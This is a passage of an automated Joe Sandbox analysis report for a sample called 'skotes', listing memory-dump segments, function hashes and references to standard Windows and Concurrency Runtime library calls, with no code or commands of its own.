Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 14fec1eb71dbf07a6bda034a9b807a345df59624d033d576d334cd00083c04e6
Instruction ID: 914b41eec5f619bc00dfcbeb10d889be0ec052cfe08466977d8cda50e4d2b80f
Opcode Fuzzy Hash: 14fec1eb71dbf07a6bda034a9b807a345df59624d033d576d334cd00083c04e6
Instruction Fuzzy Hash: D0E06D35245226A6EA3133758D45B6BBE4CDB433E0F151221EE27E6192EB2CDC8085E1

Function 00771775 Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000000,?,00771B65,?,?,00000000,?,00771B65,00000000,0000000C), ref: 00771792

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c0601b3a11d766f6d795d5427ba8375dcaef88fc63b05dc6418bed96fd7af753
Instruction ID: 31d842b50091782686e70fd9e3c0152479f85425317f5f99670877e4c64d7e7d
Opcode Fuzzy Hash: c0601b3a11d766f6d795d5427ba8375dcaef88fc63b05dc6418bed96fd7af753
Instruction Fuzzy Hash: 3AD0923214020DBBDF129E84DC02EDA7BAAFB48714F014100BE5866120C732EC31AB94

Function 04DB0DA5 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3486029794.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4db0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fd76ca91e0a5d720892164001f23545706942181a60616022233751a22e39be
Instruction ID: 1c72dec84662670c55407fe691b2da9d36ca4445a98b621358b24c09686dec1c
Opcode Fuzzy Hash: 4fd76ca91e0a5d720892164001f23545706942181a60616022233751a22e39be
Instruction Fuzzy Hash: DDE02BDB318204FD504350A16AA52F76F429667630370A592F0C3E6643B085B68975F2

Function 04DB0D9A Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3486029794.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4db0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 876666fb0e5619a3ebe217571db1f58122cb0241b2c5447881cd9b9898c09b02
Instruction ID: 578e63ea41fe41367555e96b1fdb7f8676da952bab639db8e4591b2b5cc80efc
Opcode Fuzzy Hash: 876666fb0e5619a3ebe217571db1f58122cb0241b2c5447881cd9b9898c09b02
Instruction Fuzzy Hash: A0E0E5AB30C300FE1043859156901F76B519A576303309567F0C3D6642F194F94975F2

Function 04DB0DC1 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3486029794.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4db0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af27eed9cd07997a80fd2b938cba0e02491b86067774056e2c2887e0027be310
Instruction ID: b6b9a595f4e9b7e90280c9d9c36664971f730a444eac52f3f6661df3be6e13aa
Opcode Fuzzy Hash: af27eed9cd07997a80fd2b938cba0e02491b86067774056e2c2887e0027be310
Instruction Fuzzy Hash: BDE0209761C210EE014345D115D01F77B826A275713309992E0C3DA643F19DD38A72F2

Function 04DB0DDC Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3486029794.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4db0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6902d4a80bbb48ea8ec3c7f3120ddb26f717c48b3b773165310a551f4bab463f
Instruction ID: d144c68c6927a22fab40442d3c5d3b9b58ea2deadda2224a73308663a54e6cd3
Opcode Fuzzy Hash: 6902d4a80bbb48ea8ec3c7f3120ddb26f717c48b3b773165310a551f4bab463f
Instruction Fuzzy Hash: 84E02B9B60C310EF410395D175660FB6F416967671330A9B3E0D3C6603B0C5A149B1F2

Function 04DB0DEF Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3486029794.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4db0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06fa99be882478d399504fcfdbd2c3294cb2ccd2e5dd579231bc8a185b529631
Instruction ID: 231d6ef7e97406a6341c39fc93b5e693eeb97a88f99e02adb009f51078f3c0cd
Opcode Fuzzy Hash: 06fa99be882478d399504fcfdbd2c3294cb2ccd2e5dd579231bc8a185b529631
Instruction Fuzzy Hash: 21E08C37A18225DF8203A99229651BF7382AA53A703B0657AE0C3C6506F242909AB5A1

Function 04DB0E06 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3486029794.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4db0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c41457700fe806b3402ca2098f06bbb098a4b32ffd4d5d7460f416a4c27ae740
Instruction ID: 266ca174e1967f77066771a3152a4c1edcfc18c78d4b3194243558ef9de004bf
Opcode Fuzzy Hash: c41457700fe806b3402ca2098f06bbb098a4b32ffd4d5d7460f416a4c27ae740
Instruction Fuzzy Hash: 2EC01263608211DE4103A4D165740BB7B41595B571370ED73E0D7CA112E585D085B572

Function 04DB0E24 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3486029794.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4db0000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dbf202bdf19252bef6d3c7f10009893fa3385d1c22d0680a899b6a04b8186ba
Instruction ID: 4a5fddffdc4f4a18029f8877590e94d2f5839a4d5810f4e3f5f8f1d4d2325f6f
Opcode Fuzzy Hash: 0dbf202bdf19252bef6d3c7f10009893fa3385d1c22d0680a899b6a04b8186ba
Instruction Fuzzy Hash: 0AC02B53004300DF000365C114301FB3B411D275303B0A0A3F0D7C650324CA4040B2A2

Non-executed Functions

Function 00750E13 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00750F16
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00750F62

Part of subcall function 0075265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00752750

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00750FCE
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00750FEA
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0075103E
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0075106B
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 007510C1

Strings

(, xrefs: 00750F22

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: da39bb24821bceebca16ca67488ce5c64ea09e30e5ac9c201b6598baa48043b6
Instruction ID: fce9512b1e9777cb43d196d09064a1343dfe5fd8f678170e49eb9ad599951721
Opcode Fuzzy Hash: da39bb24821bceebca16ca67488ce5c64ea09e30e5ac9c201b6598baa48043b6
Instruction Fuzzy Hash: 63B18FB0A00615EFCB28CF58D981BBDB7B4FF44302F54816EE805AB681D778AD85CB94

Function 00751602 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00752CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00752D0F

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00751614

Part of subcall function 00752E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00752E39
Part of subcall function 00752E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00752EA8

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00751746
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 007517A6
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 007517B2
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 007517ED
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0075180E
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0075181A
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00751823
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0075183B

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: a5a9def7031cc9cb789599c3187eb88d675ee0a876781fa6f414312643e12808
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: F7817B75E00225DFCB18CFA8C584AADB7F1FF48306B5546ADD805A7702DBB4AD46CB84

Function 0075EC48 Relevance: 6.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0075EC81

Part of subcall function 00758F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00758F50

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0075ECE7
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0075ECFF
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0075ED0C

Part of subcall function 0075E7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0075E7D7
Part of subcall function 0075E7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0075E86F
Part of subcall function 0075E7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0075E879
Part of subcall function 0075E7AF: Concurrency::location::_Assign.LIBCMT ref: 0075E8AD
Part of subcall function 0075E7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0075E8B5

Memory Dump Source

